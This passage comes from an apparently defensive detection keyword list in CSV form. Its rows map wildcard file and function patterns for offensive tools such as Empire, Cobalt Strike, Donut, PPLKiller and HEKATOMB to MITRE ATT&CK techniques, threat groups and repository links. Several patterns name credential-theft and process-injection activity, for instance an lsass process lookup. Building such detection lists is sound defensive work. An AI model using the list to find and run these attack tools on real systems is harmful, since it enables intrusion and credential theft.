-*ProcessEncryptedC2Request*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*ProcessFileZillaFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*processhacker-*-sdk.zip*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*processhacker-*-setup.exe*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*processhacker-*-src.zip*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*ProcessHacker.exe*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*ProcessHacker.sln*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*ProcessHerpaderping_x64*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ProcessHerpaderping_x86*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ProcessHerpaderpingTemplate*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*processhider.c*,offensive_tool_keyword,Sudomy,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*-ProcessID * -Dll * -Module *,offensive_tool_keyword,empire,empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*processImplantMessage*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*process-inject *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*processinject_min_alloc*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*ProcessManager.exe --machine *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*ProcessManager.exe --name explorer*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*processPIDByName*lsass.exe*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,0,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*ProcessPPKFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessPuTTYLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessRDPFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessRDPLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessSuperPuTTYFile*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Process-TaskingPackets*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessThoroughLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ProcessThoroughRemote*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Processus-Thief/HEKATOMB*,offensive_tool_keyword,HEKATOMB,Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them,T1087.002 - T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,AD Enumeration,https://github.com/Processus-Thief/HEKATOMB,1,1,N/A,N/A,4,372,40,2023-02-08T16:00:47Z,2022-09-09T15:07:15Z -*ProcessWinSCPLocal*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*produkey.zip*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*produkey_setup.exe*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*produkey-x64.zip*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 